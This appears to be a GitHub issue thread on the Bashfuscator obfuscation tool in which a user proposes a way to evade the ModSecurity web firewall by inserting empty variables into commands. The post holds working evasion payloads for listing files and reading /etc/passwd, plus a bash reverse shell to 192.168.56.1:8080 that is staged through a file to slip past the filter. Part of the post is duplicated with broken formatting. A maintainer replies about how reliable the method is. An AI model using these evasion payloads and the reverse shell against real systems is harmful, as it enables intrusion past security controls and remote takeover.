You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I've tested this method and it bypassed mod security perfectly so i think it will be wonderful if bashfucscator can add this method.
Test case 1:
Command ls -la get blocked by mod security
ls$u -la worked
Test case 2:
command cat /etc/passwd get blocked by mod security
command cat$u /etc$x/passwd$y worked
Test case 3:
-/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1 doesn't get blocked but it can't create connection (reverse shell) so i did it manually (Use pipeline may have blocked by mod security by characters |, ;, &&)
Step 1: echo$x "/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1" > file name
Step 2: bash$a filename
Bashfuscator already does this to a certain extent; the special variables $@ and $* are liberally placed throughout obfuscated payloads. The reason only these variables are used, is because they are special reserved variables for Bash, and due to the way Bashfuscator works, they will almost always be blank.
Generating randomly named variables and inserting them in Bash payloads is pretty risky... Bashfuscator can't know what variables will be already used in the environment in which payloads will be run, so there is a chance that payloads will fail in certain environments.
For instance, say that in the environment you're currently in, the variable $foo is initialized. Say also that you generate a payload with Bashfuscator, and using your uninitialized variable obfuscation method, it by chance inserts $foo into part of the payload. Because $foo is set, the payload will fail to execute. See the issue?
Bashfuscator already does this to a certain extent; the special variables $@ and $* are liberally placed throughout obfuscated payloads.
I noticed about this before i created the issue. But current modules use pipeline to execute command so it can't bypass waf (mod security for example). So is there any chance to run command without pipeline (like add options --no-pipeline?). IMO create obfuscated payload that can bypass waf is the thing that everybody needs :D
Generating randomly named variables and inserting them in Bash payloads is pretty risky...
I've tested this method and it bypassed mod security perfectly so i think it will be wonderful if bashfucscator can add this method.
Test case 1:
ls -la
get blocked by mod securityls$u -la
workedTest case 2:
cat /etc/passwd
get blocked by mod securitycat$u /etc$x/passwd$y
workedTest case 3:
-
/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1
doesn't get blocked but it can't create connection (reverse shell) so i did it manually (Use pipeline may have blocked by mod security by characters|
,;
,&&
)Step 1:
echo$x "/bin$u/bash$u -i >& /dev$u/tcp$u/192.168.56.1/8080 0>&1" > file name
Step 2:
bash$a filename
Source:
https://www.secjuice.com/web-application-firewall-waf-evasion/
The text was updated successfully, but these errors were encountered: